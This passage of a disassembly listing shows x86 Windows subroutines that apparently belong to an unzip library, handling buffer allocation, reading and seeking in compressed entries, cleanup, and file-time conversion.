mov [ebp+var_4], 0FFFFFFFFh
loc_42F7B2: ; CODE XREF: sub_42F55B+24E�j
mov edx, [ebp+arg_0]
mov eax, [edx+78h]
mov ecx, [ebp+var_C]
lea edx, [eax+ecx+1Eh]
mov eax, [ebp+arg_8]
mov [eax], edx
mov ecx, [ebp+arg_C]
mov edx, [ebp+var_8]
mov [ecx], edx
mov eax, [ebp+arg_4]
mov ecx, [eax]
add ecx, [ebp+var_8]
mov edx, [ebp+arg_4]
mov [edx], ecx
mov eax, [ebp+var_4]
loc_42F7DC: ; CODE XREF: sub_42F55B+4C�j
mov esp, ebp
pop ebp
retn
sub_42F55B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F7E0 proc near ; CODE XREF: sub_4308E2+DE�p
; sub_4308E2+3D8�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
cmp [ebp+arg_0], 0
jnz short loc_42F7F6
mov eax, 0FFFFFF9Ah
jmp loc_42F99E
; ---------------------------------------------------------------------------
loc_42F7F6: ; CODE XREF: sub_42F7E0+A�j
mov eax, [ebp+arg_0]
mov [ebp+var_C], eax
mov ecx, [ebp+var_C]
cmp dword ptr [ecx+18h], 0
jnz short loc_42F80F
mov eax, 0FFFFFF9Ah
jmp loc_42F99E
; ---------------------------------------------------------------------------
loc_42F80F: ; CODE XREF: sub_42F7E0+23�j
mov edx, [ebp+var_C]
cmp dword ptr [edx+7Ch], 0
jz short loc_42F824
mov eax, [ebp+arg_0]
push eax
call sub_42FDD7
add esp, 4
loc_42F824: ; CODE XREF: sub_42F7E0+36�j
lea ecx, [ebp+var_10]
push ecx
lea edx, [ebp+var_1C]
push edx
lea eax, [ebp+var_18]
push eax
mov ecx, [ebp+var_C]
push ecx
call sub_42F55B
add esp, 10h
test eax, eax
jz short loc_42F84A
mov eax, 0FFFFFF99h
jmp loc_42F99E
; ---------------------------------------------------------------------------
loc_42F84A: ; CODE XREF: sub_42F7E0+5E�j
push 6Ch
call dword_4331C8 ; malloc
add esp, 4
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_42F868
mov eax, 0FFFFFF98h
jmp loc_42F99E
; ---------------------------------------------------------------------------
loc_42F868: ; CODE XREF: sub_42F7E0+7C�j
push 4000h
call dword_4331C8 ; malloc
add esp, 4
mov edx, [ebp+var_8]
mov [edx], eax
mov eax, [ebp+var_8]
mov ecx, [ebp+var_1C]
mov [eax+44h], ecx
mov edx, [ebp+var_8]
mov eax, [ebp+var_10]
mov [edx+48h], eax
mov ecx, [ebp+var_8]
mov dword ptr [ecx+4Ch], 0
mov edx, [ebp+var_8]
cmp dword ptr [edx], 0
jnz short loc_42F8BC
cmp [ebp+var_8], 0
jz short loc_42F8B2
mov eax, [ebp+var_8]
push eax
call dword_4331D4 ; free
add esp, 4
loc_42F8B2: ; CODE XREF: sub_42F7E0+C3�j
mov eax, 0FFFFFF98h
jmp loc_42F99E
; ---------------------------------------------------------------------------
loc_42F8BC: ; CODE XREF: sub_42F7E0+BD�j
mov ecx, [ebp+var_8]
mov dword ptr [ecx+40h], 0
mov ecx, [ebp+var_C]
xor edx, edx
cmp dword ptr [ecx+34h], 0
setz dl
mov [ebp+var_14], edx
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
mov edx, [ecx+3Ch]
mov [eax+54h], edx
mov eax, [ebp+var_8]
mov dword ptr [eax+50h], 0
mov ecx, [ebp+var_8]
mov edx, [ebp+var_C]
mov eax, [edx+34h]
mov [ecx+64h], eax
mov ecx, [ebp+var_8]
mov edx, [ebp+var_C]
mov eax, [edx]
mov [ecx+60h], eax
mov ecx, [ebp+var_8]
mov edx, [ebp+var_C]
mov eax, [edx+0Ch]
mov [ecx+68h], eax
mov ecx, [ebp+var_8]
mov dword ptr [ecx+18h], 0
cmp [ebp+var_14], 0
jnz short loc_42F95E
mov edx, [ebp+var_8]
mov dword ptr [edx+24h], 0
mov eax, [ebp+var_8]
mov dword ptr [eax+28h], 0
mov ecx, [ebp+var_8]
mov dword ptr [ecx+2Ch], 0
mov edx, [ebp+var_8]
add edx, 4
push edx
call sub_42DBE5
add esp, 4
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_42F95E
mov eax, [ebp+var_8]
mov dword ptr [eax+40h], 1
loc_42F95E: ; CODE XREF: sub_42F7E0+13C�j
; sub_42F7E0+172�j
mov ecx, [ebp+var_8]
mov edx, [ebp+var_C]
mov eax, [edx+40h]
mov [ecx+58h], eax
mov ecx, [ebp+var_8]
mov edx, [ebp+var_C]
mov eax, [edx+44h]
mov [ecx+5Ch], eax
mov ecx, [ebp+var_C]
mov edx, [ecx+78h]
mov eax, [ebp+var_18]
lea ecx, [edx+eax+1Eh]
mov edx, [ebp+var_8]
mov [edx+3Ch], ecx
mov eax, [ebp+var_8]
mov dword ptr [eax+8], 0
mov ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [ecx+7Ch], edx
xor eax, eax
loc_42F99E: ; CODE XREF: sub_42F7E0+11�j
; sub_42F7E0+2A�j ...
mov esp, ebp
pop ebp
retn
sub_42F7E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F9A2 proc near ; CODE XREF: sub_4308E2+103�p
; sub_4308E2+3FC�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 30h
push esi
mov [ebp+var_4], 0
mov [ebp+var_10], 0
mov eax, [ebp+arg_0]
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_42F9CD
mov eax, 0FFFFFF9Ah
jmp loc_42FC94
; ---------------------------------------------------------------------------
loc_42F9CD: ; CODE XREF: sub_42F9A2+1F�j
mov ecx, [ebp+var_C]
mov edx, [ecx+7Ch]
mov [ebp+var_8], edx
cmp [ebp+var_8], 0
jnz short loc_42F9E6
mov eax, 0FFFFFF9Ah
jmp loc_42FC94
; ---------------------------------------------------------------------------
loc_42F9E6: ; CODE XREF: sub_42F9A2+38�j
mov eax, [ebp+var_8]
cmp dword ptr [eax], 0
jnz short loc_42F9F8
mov eax, 0FFFFFF9Ch
jmp loc_42FC94
; ---------------------------------------------------------------------------
loc_42F9F8: ; CODE XREF: sub_42F9A2+4A�j
cmp [ebp+arg_8], 0
jnz short loc_42FA05
xor eax, eax
jmp loc_42FC94
; ---------------------------------------------------------------------------
loc_42FA05: ; CODE XREF: sub_42F9A2+5A�j
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_4]
mov [ecx+10h], edx
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
mov [eax+14h], ecx
mov edx, [ebp+var_8]
mov eax, [ebp+arg_8]
cmp eax, [edx+5Ch]
jbe short loc_42FA2E
mov ecx, [ebp+var_8]
mov edx, [ebp+var_8]
mov eax, [edx+5Ch]
mov [ecx+14h], eax
loc_42FA2E: ; CODE XREF: sub_42F9A2+7E�j
; sub_42F9A2:loc_42FC81�j
mov ecx, [ebp+var_8]
cmp dword ptr [ecx+14h], 0
jbe loc_42FC86
mov edx, [ebp+var_8]
cmp dword ptr [edx+8], 0
jnz loc_42FB01
mov eax, [ebp+var_8]
cmp dword ptr [eax+58h], 0
jbe loc_42FB01
mov [ebp+var_14], 4000h
mov ecx, [ebp+var_8]
mov edx, [ecx+58h]
cmp edx, [ebp+var_14]
jnb short loc_42FA70
mov eax, [ebp+var_8]
mov ecx, [eax+58h]
mov [ebp+var_14], ecx
loc_42FA70: ; CODE XREF: sub_42F9A2+C3�j
cmp [ebp+var_14], 0
jnz short loc_42FA7D
xor eax, eax
jmp loc_42FC94
; ---------------------------------------------------------------------------
loc_42FA7D: ; CODE XREF: sub_42F9A2+D2�j
push 0
mov edx, [ebp+var_8]
mov eax, [edx+3Ch]
mov ecx, [ebp+var_8]
add eax, [ecx+68h]
push eax
mov edx, [ebp+var_8]
mov eax, [edx+60h]
push eax
call sub_42E66B
add esp, 0Ch
test eax, eax
jz short loc_42FAA7
or eax, 0FFFFFFFFh
jmp loc_42FC94
; ---------------------------------------------------------------------------
loc_42FAA7: ; CODE XREF: sub_42F9A2+FB�j
mov ecx, [ebp+var_8]
mov edx, [ecx+60h]
push edx
push 1
mov eax, [ebp+var_14]
push eax
mov ecx, [ebp+var_8]
mov edx, [ecx]
push edx
call sub_42E740
add esp, 10h
cmp eax, 1
jz short loc_42FACF
or eax, 0FFFFFFFFh
jmp loc_42FC94
; ---------------------------------------------------------------------------
loc_42FACF: ; CODE XREF: sub_42F9A2+123�j
mov eax, [ebp+var_8]
mov ecx, [eax+3Ch]
add ecx, [ebp+var_14]
mov edx, [ebp+var_8]
mov [edx+3Ch], ecx
mov eax, [ebp+var_8]
mov ecx, [eax+58h]
sub ecx, [ebp+var_14]
mov edx, [ebp+var_8]
mov [edx+58h], ecx
mov eax, [ebp+var_8]
mov ecx, [ebp+var_8]
mov edx, [ecx]
mov [eax+4], edx
mov eax, [ebp+var_8]
mov ecx, [ebp+var_14]
mov [eax+8], ecx
loc_42FB01: ; CODE XREF: sub_42F9A2+A0�j
; sub_42F9A2+AD�j
mov edx, [ebp+var_8]
cmp dword ptr [edx+64h], 0
jnz loc_42FBEC
mov eax, [ebp+var_8]
mov ecx, [ebp+var_8]
mov edx, [eax+14h]
cmp edx, [ecx+8]
jnb short loc_42FB27
mov eax, [ebp+var_8]
mov ecx, [eax+14h]
mov [ebp+var_18], ecx
jmp short loc_42FB30
; ---------------------------------------------------------------------------
loc_42FB27: ; CODE XREF: sub_42F9A2+178�j
mov edx, [ebp+var_8]
mov eax, [edx+8]
mov [ebp+var_18], eax
loc_42FB30: ; CODE XREF: sub_42F9A2+183�j
mov [ebp+var_1C], 0
jmp short loc_42FB42
; ---------------------------------------------------------------------------
loc_42FB39: ; CODE XREF: sub_42F9A2+1C0�j
mov ecx, [ebp+var_1C]
add ecx, 1
mov [ebp+var_1C], ecx
loc_42FB42: ; CODE XREF: sub_42F9A2+195�j
mov edx, [ebp+var_1C]
cmp edx, [ebp+var_18]
jnb short loc_42FB64
mov eax, [ebp+var_8]
mov ecx, [eax+4]
mov edx, [ebp+var_8]
mov eax, [edx+10h]
mov edx, [ebp+var_1C]
mov esi, [ebp+var_1C]
mov cl, [ecx+esi]
mov [eax+edx], cl
jmp short loc_42FB39
; ---------------------------------------------------------------------------
loc_42FB64: ; CODE XREF: sub_42F9A2+1A6�j
mov edx, [ebp+var_18]
push edx
mov eax, [ebp+var_8]
mov ecx, [eax+10h]
push ecx
mov edx, [ebp+var_8]
mov eax, [edx+50h]
push eax
call sub_42D665
add esp, 0Ch
mov ecx, [ebp+var_8]
mov [ecx+50h], eax
mov edx, [ebp+var_8]
mov eax, [edx+5Ch]
sub eax, [ebp+var_18]
mov ecx, [ebp+var_8]
mov [ecx+5Ch], eax
mov edx, [ebp+var_8]
mov eax, [edx+8]
sub eax, [ebp+var_18]
mov ecx, [ebp+var_8]
mov [ecx+8], eax
mov edx, [ebp+var_8]
mov eax, [edx+14h]
sub eax, [ebp+var_18]
mov ecx, [ebp+var_8]
mov [ecx+14h], eax
mov edx, [ebp+var_8]
mov eax, [edx+10h]
add eax, [ebp+var_18]
mov ecx, [ebp+var_8]
mov [ecx+10h], eax
mov edx, [ebp+var_8]
mov eax, [edx+4]
add eax, [ebp+var_18]
mov ecx, [ebp+var_8]
mov [ecx+4], eax
mov edx, [ebp+var_8]
mov eax, [edx+18h]
add eax, [ebp+var_18]
mov ecx, [ebp+var_8]
mov [ecx+18h], eax
mov edx, [ebp+var_10]
add edx, [ebp+var_18]
mov [ebp+var_10], edx
jmp loc_42FC81
; ---------------------------------------------------------------------------
loc_42FBEC: ; CODE XREF: sub_42F9A2+166�j
mov [ebp+var_30], 2
mov eax, [ebp+var_8]
mov ecx, [eax+18h]
mov [ebp+var_28], ecx
mov edx, [ebp+var_8]
mov eax, [edx+10h]
mov [ebp+var_2C], eax
mov ecx, [ebp+var_30]
push ecx
mov edx, [ebp+var_8]
add edx, 4
push edx
call sub_42DD65
add esp, 8
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
mov ecx, [eax+18h]
mov [ebp+var_20], ecx
mov edx, [ebp+var_20]
sub edx, [ebp+var_28]
mov [ebp+var_24], edx
mov eax, [ebp+var_24]
push eax
mov ecx, [ebp+var_2C]
push ecx
mov edx, [ebp+var_8]
mov eax, [edx+50h]
push eax
call sub_42D665
add esp, 0Ch
mov ecx, [ebp+var_8]
mov [ecx+50h], eax
mov edx, [ebp+var_8]
mov eax, [edx+5Ch]
sub eax, [ebp+var_24]
mov ecx, [ebp+var_8]
mov [ecx+5Ch], eax
mov edx, [ebp+var_20]
sub edx, [ebp+var_28]
mov eax, [ebp+var_10]
add eax, edx
mov [ebp+var_10], eax
cmp [ebp+var_4], 1
jnz short loc_42FC79
mov eax, [ebp+var_10]
neg eax
sbb eax, eax
and eax, [ebp+var_10]
jmp short loc_42FC94
; ---------------------------------------------------------------------------
loc_42FC79: ; CODE XREF: sub_42F9A2+2C9�j
cmp [ebp+var_4], 0
jz short loc_42FC81
jmp short loc_42FC86
; ---------------------------------------------------------------------------
loc_42FC81: ; CODE XREF: sub_42F9A2+245�j
; sub_42F9A2+2DB�j
jmp loc_42FA2E
; ---------------------------------------------------------------------------
loc_42FC86: ; CODE XREF: sub_42F9A2+93�j
; sub_42F9A2+2DD�j
cmp [ebp+var_4], 0
jnz short loc_42FC91
mov eax, [ebp+var_10]
jmp short loc_42FC94
; ---------------------------------------------------------------------------
loc_42FC91: ; CODE XREF: sub_42F9A2+2E8�j
mov eax, [ebp+var_4]
loc_42FC94: ; CODE XREF: sub_42F9A2+26�j
; sub_42F9A2+3F�j ...
pop esi
mov esp, ebp
pop ebp
retn
sub_42F9A2 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
cmp dword ptr [ebp+8], 0
jnz short loc_42FCAC
mov eax, 0FFFFFF9Ah
jmp short loc_42FCCE
; ---------------------------------------------------------------------------
loc_42FCAC: ; CODE XREF: HLXc:0042FCA3�j
mov eax, [ebp+8]
mov [ebp-8], eax
mov ecx, [ebp-8]
mov edx, [ecx+7Ch]
mov [ebp-4], edx
cmp dword ptr [ebp-4], 0
jnz short loc_42FCC8
mov eax, 0FFFFFF9Ah
jmp short loc_42FCCE
; ---------------------------------------------------------------------------
loc_42FCC8: ; CODE XREF: HLXc:0042FCBF�j
mov eax, [ebp-4]
mov eax, [eax+18h]
loc_42FCCE: ; CODE XREF: HLXc:0042FCAA�j
; HLXc:0042FCC6�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
cmp dword ptr [ebp+8], 0
jnz short loc_42FCE5
mov eax, 0FFFFFF9Ah
jmp short loc_42FD13
; ---------------------------------------------------------------------------
loc_42FCE5: ; CODE XREF: HLXc:0042FCDC�j
mov eax, [ebp+8]
mov [ebp-8], eax
mov ecx, [ebp-8]
mov edx, [ecx+7Ch]
mov [ebp-4], edx
cmp dword ptr [ebp-4], 0
jnz short loc_42FD01
mov eax, 0FFFFFF9Ah
jmp short loc_42FD13
; ---------------------------------------------------------------------------
loc_42FD01: ; CODE XREF: HLXc:0042FCF8�j
mov eax, [ebp-4]
cmp dword ptr [eax+5Ch], 0
jnz short loc_42FD11
mov eax, 1
jmp short loc_42FD13
; ---------------------------------------------------------------------------
loc_42FD11: ; CODE XREF: HLXc:0042FD08�j
xor eax, eax
loc_42FD13: ; CODE XREF: HLXc:0042FCE3�j
; HLXc:0042FCFF�j ...
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
cmp dword ptr [ebp+8], 0
jnz short loc_42FD2D
mov eax, 0FFFFFF9Ah
jmp loc_42FDD3
; ---------------------------------------------------------------------------
loc_42FD2D: ; CODE XREF: HLXc:0042FD21�j
mov eax, [ebp+8]
mov [ebp-8], eax
mov ecx, [ebp-8]
mov edx, [ecx+7Ch]
mov [ebp-4], edx
cmp dword ptr [ebp-4], 0
jnz short loc_42FD4C
mov eax, 0FFFFFF9Ah
jmp loc_42FDD3
; ---------------------------------------------------------------------------
loc_42FD4C: ; CODE XREF: HLXc:0042FD40�j
mov eax, [ebp-4]
mov ecx, [ebp-4]
mov edx, [eax+48h]
sub edx, [ecx+4Ch]
mov [ebp-0Ch], edx
cmp dword ptr [ebp+0Ch], 0
jnz short loc_42FD66
mov eax, [ebp-0Ch]
jmp short loc_42FDD3
; ---------------------------------------------------------------------------
loc_42FD66: ; CODE XREF: HLXc:0042FD5F�j
mov eax, [ebp+10h]
cmp eax, [ebp-0Ch]
jbe short loc_42FD76
mov ecx, [ebp-0Ch]
mov [ebp-10h], ecx
jmp short loc_42FD7C
; ---------------------------------------------------------------------------
loc_42FD76: ; CODE XREF: HLXc:0042FD6C�j
mov edx, [ebp+10h]
mov [ebp-10h], edx
loc_42FD7C: ; CODE XREF: HLXc:0042FD74�j
cmp dword ptr [ebp-10h], 0
jnz short loc_42FD86
xor eax, eax
jmp short loc_42FDD3
; ---------------------------------------------------------------------------
loc_42FD86: ; CODE XREF: HLXc:0042FD80�j
push 0
mov eax, [ebp-4]
mov ecx, [eax+44h]
mov edx, [ebp-4]
add ecx, [edx+4Ch]
push ecx
mov eax, [ebp-4]
mov ecx, [eax+60h]
push ecx
call sub_42E66B
add esp, 0Ch
test eax, eax
jz short loc_42FDAD
or eax, 0FFFFFFFFh
jmp short loc_42FDD3
; ---------------------------------------------------------------------------
loc_42FDAD: ; CODE XREF: HLXc:0042FDA6�j
mov edx, [ebp-4]
mov eax, [edx+60h]
push eax
push 1
mov ecx, [ebp-0Ch]
push ecx
mov edx, [ebp+0Ch]
push edx
call sub_42E740
add esp, 10h
cmp eax, 1
jz short loc_42FDD0
or eax, 0FFFFFFFFh
jmp short loc_42FDD3
; ---------------------------------------------------------------------------
loc_42FDD0: ; CODE XREF: HLXc:0042FDC9�j
mov eax, [ebp-10h]
loc_42FDD3: ; CODE XREF: HLXc:0042FD28�j
; HLXc:0042FD47�j ...
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42FDD7 proc near ; CODE XREF: sub_42EDD8+24�p
; sub_42F7E0+3C�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_4], 0
cmp [ebp+arg_0], 0
jnz short loc_42FDF4
mov eax, 0FFFFFF9Ah
jmp loc_42FEA2
; ---------------------------------------------------------------------------
loc_42FDF4: ; CODE XREF: sub_42FDD7+11�j
mov eax, [ebp+arg_0]
mov [ebp+var_C], eax
mov ecx, [ebp+var_C]
mov edx, [ecx+7Ch]
mov [ebp+var_8], edx
cmp [ebp+var_8], 0
jnz short loc_42FE13
mov eax, 0FFFFFF9Ah
jmp loc_42FEA2
; ---------------------------------------------------------------------------
loc_42FE13: ; CODE XREF: sub_42FDD7+30�j
mov eax, [ebp+var_8]
cmp dword ptr [eax+5Ch], 0
jnz short loc_42FE31
mov ecx, [ebp+var_8]
mov edx, [ebp+var_8]
mov eax, [ecx+50h]
cmp eax, [edx+54h]
jz short loc_42FE31
mov [ebp+var_4], 0FFFFFF97h
loc_42FE31: ; CODE XREF: sub_42FDD7+43�j
; sub_42FDD7+51�j
mov ecx, [ebp+var_8]
cmp dword ptr [ecx], 0
jz short loc_42FE57
mov edx, [ebp+var_8]
mov eax, [edx]
mov [ebp+var_10], eax
mov ecx, [ebp+var_10]
push ecx
call dword_4331D4 ; free
add esp, 4
mov edx, [ebp+var_8]
mov dword ptr [edx], 0
loc_42FE57: ; CODE XREF: sub_42FDD7+60�j
mov eax, [ebp+var_8]
mov dword ptr [eax], 0
mov ecx, [ebp+var_8]
cmp dword ptr [ecx+40h], 0
jz short loc_42FE78
mov edx, [ebp+var_8]
add edx, 4
push edx
call sub_42DB7C
add esp, 4
loc_42FE78: ; CODE XREF: sub_42FDD7+90�j
mov eax, [ebp+var_8]
mov dword ptr [eax+40h], 0
cmp [ebp+var_8], 0
jz short loc_42FE95
mov ecx, [ebp+var_8]
push ecx
call dword_4331D4 ; free
add esp, 4
loc_42FE95: ; CODE XREF: sub_42FDD7+AF�j
mov edx, [ebp+var_C]
mov dword ptr [edx+7Ch], 0
mov eax, [ebp+var_4]
loc_42FEA2: ; CODE XREF: sub_42FDD7+18�j
; sub_42FDD7+37�j
mov esp, ebp
pop ebp
retn
sub_42FDD7 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
cmp dword ptr [ebp+8], 0
jnz short loc_42FEBC
mov eax, 0FFFFFF9Ah
jmp loc_42FF4E
; ---------------------------------------------------------------------------
loc_42FEBC: ; CODE XREF: HLXc:0042FEB0�j
mov eax, [ebp+8]
mov [ebp-4], eax
mov ecx, [ebp+10h]
mov [ebp-8], ecx
mov edx, [ebp-4]
mov eax, [ebp-8]
cmp eax, [edx+8]
jbe short loc_42FEDC
mov ecx, [ebp-4]
mov edx, [ecx+8]
mov [ebp-8], edx
loc_42FEDC: ; CODE XREF: HLXc:0042FED1�j
push 0
mov eax, [ebp-4]
mov ecx, [eax+1Ch]
add ecx, 16h
push ecx
mov edx, [ebp-4]
mov eax, [edx]
push eax
call sub_42E66B
add esp, 0Ch
test eax, eax
jz short loc_42FEFF
or eax, 0FFFFFFFFh
jmp short loc_42FF4E
; ---------------------------------------------------------------------------
loc_42FEFF: ; CODE XREF: HLXc:0042FEF8�j
cmp dword ptr [ebp-8], 0
jbe short loc_42FF2D
mov ecx, [ebp+0Ch]
mov byte ptr [ecx], 0
mov edx, [ebp-4]
mov eax, [edx]
push eax
push 1
mov ecx, [ebp-8]
push ecx
mov edx, [ebp+0Ch]
push edx
call sub_42E740
add esp, 10h
cmp eax, 1
jz short loc_42FF2D
or eax, 0FFFFFFFFh
jmp short loc_42FF4E
; ---------------------------------------------------------------------------
loc_42FF2D: ; CODE XREF: HLXc:0042FF03�j
; HLXc:0042FF26�j
cmp dword ptr [ebp+0Ch], 0
jz short loc_42FF4B
mov eax, [ebp-4]
mov ecx, [ebp+10h]
cmp ecx, [eax+8]
jbe short loc_42FF4B
mov edx, [ebp-4]
mov eax, [edx+8]
mov ecx, [ebp+0Ch]
mov byte ptr [ecx+eax], 0
loc_42FF4B: ; CODE XREF: HLXc:0042FF31�j
; HLXc:0042FF3C�j
mov eax, [ebp-8]
loc_42FF4E: ; CODE XREF: HLXc:0042FEB7�j
; HLXc:0042FEFD�j ...
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42FF52 proc near ; CODE XREF: sub_43007C+55B�p
; sub_43007C+5B8�p ...
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_16 = word ptr -16h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
lea eax, [ebp+arg_0]
push eax
call dword_433210 ; gmtime
add esp, 4
mov [ebp+var_C], eax
mov ecx, [ebp+var_C]
mov edx, [ecx+14h]
add edx, 76Ch
mov [ebp+var_1C], dx
mov eax, [ebp+var_C]
mov ecx, [eax+10h]
add ecx, 1
mov [ebp+var_1A], cx
mov edx, [ebp+var_C]
mov ax, [edx+0Ch]
mov [ebp+var_16], ax
mov ecx, [ebp+var_C]
mov dx, [ecx+8]
mov [ebp+var_14], dx
mov eax, [ebp+var_C]
mov cx, [eax+4]
mov [ebp+var_12], cx
mov edx, [ebp+var_C]
mov ax, [edx]
mov [ebp+var_10], ax
mov [ebp+var_E], 0
lea ecx, [ebp+var_8]
push ecx
lea edx, [ebp+var_1C]
push edx
call dword_433098 ; SystemTimeToFileTime
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_42FF52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42FFCE proc near ; CODE XREF: sub_43110B+6E�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], ecx
mov eax, [ebp+var_10]
cmp dword ptr [eax], 0
jnz short loc_42FFE8
mov ecx, [ebp+var_10]
cmp dword ptr [ecx+4], 0FFFFFFFFh
jz short loc_42FFF2
loc_42FFE8: ; CODE XREF: sub_42FFCE+F�j
mov eax, 1000000h
jmp loc_430076
; ---------------------------------------------------------------------------
loc_42FFF2: ; CODE XREF: sub_42FFCE+18�j
mov edx, [ebp+var_10]
add edx, 138h
push edx
push 104h
call dword_43302C ; GetCurrentDirectoryA
push offset asc_4378D4 ; "\\"
mov eax, [ebp+var_10]
add eax, 138h
push eax
call sub_431770 ; strcat
add esp, 8
cmp [ebp+arg_8], 1
jnz short loc_43003D
mov ecx, [ebp+arg_0]
push ecx
call dword_4330A4 ; GetFileType
mov [ebp+var_C], eax
cmp [ebp+var_C], 1
jz short loc_43003D
mov eax, 2000000h
jmp short loc_430076
; ---------------------------------------------------------------------------
loc_43003D: ; CODE XREF: sub_42FFCE+53�j
; sub_42FFCE+66�j
lea edx, [ebp+var_4]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_42E429
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_430063
mov eax, [ebp+var_4]
jmp short loc_430076
; ---------------------------------------------------------------------------
loc_430063: ; CODE XREF: sub_42FFCE+8E�j
mov eax, [ebp+var_8]
push eax
call sub_42EBC2
add esp, 4
mov ecx, [ebp+var_10]
mov [ecx], eax
xor eax, eax
loc_430076: ; CODE XREF: sub_42FFCE+1F�j
; sub_42FFCE+6D�j ...
mov esp, ebp
pop ebp
retn 0Ch
sub_42FFCE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43007C proc near ; CODE XREF: sub_430707+B9�p
; sub_4308E2+1F5�p ...
var_1E8 = dword ptr -1E8h
var_1E4 = dword ptr -1E4h
var_1E0 = dword ptr -1E0h
var_1DC = dword ptr -1DCh
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = dword ptr -1D0h
var_1CC = dword ptr -1CCh
var_1C8 = dword ptr -1C8h
var_1C4 = dword ptr -1C4h
var_1C0 = dword ptr -1C0h
var_1BC = dword ptr -1BCh
var_1B8 = dword ptr -1B8h
var_1B4 = byte ptr -1B4h
var_1B3 = byte ptr -1B3h
var_1B2 = byte ptr -1B2h
var_1B0 = dword ptr -1B0h
var_1AC = dword ptr -1ACh
var_1A8 = dword ptr -1A8h
var_1A4 = dword ptr -1A4h
var_1A0 = dword ptr -1A0h
var_19C = dword ptr -19Ch
var_198 = dword ptr -198h
var_194 = dword ptr -194h
var_190 = byte ptr -190h
var_8C = byte ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = word ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = word ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = byte ptr -58h
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_24 = dword ptr -24h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1E8h
mov [ebp+var_1E8], ecx
cmp [ebp+arg_0], 0FFFFFFFFh
jl short loc_4300A1
mov eax, [ebp+var_1E8]
mov ecx, [eax]
mov edx, [ebp+arg_0]
cmp edx, [ecx+4]
jl short loc_4300AB
loc_4300A1: ; CODE XREF: sub_43007C+13�j
mov eax, 10000h
jmp loc_430701
; ---------------------------------------------------------------------------
loc_4300AB: ; CODE XREF: sub_43007C+23�j
mov eax, [ebp+var_1E8]
cmp dword ptr [eax+4], 0FFFFFFFFh
jz short loc_4300C8
mov ecx, [ebp+var_1E8]
mov edx, [ecx]
push edx
call sub_42FDD7
add esp, 4
loc_4300C8: ; CODE XREF: sub_43007C+39�j
mov eax, [ebp+var_1E8]
mov dword ptr [eax+4], 0FFFFFFFFh
mov ecx, [ebp+var_1E8]
mov edx, [ebp+arg_0]
cmp edx, [ecx+134h]
jnz short loc_43010E
cmp [ebp+arg_0], 0FFFFFFFFh
jz short loc_43010E
push 12Ch
mov eax, [ebp+var_1E8]
add eax, 8
push eax
mov ecx, [ebp+arg_4]
push ecx
call sub_431764 ; memcpy
add esp, 0Ch
xor eax, eax
jmp loc_430701
; ---------------------------------------------------------------------------
loc_43010E: ; CODE XREF: sub_43007C+68�j
; sub_43007C+6E�j
cmp [ebp+arg_0], 0FFFFFFFFh
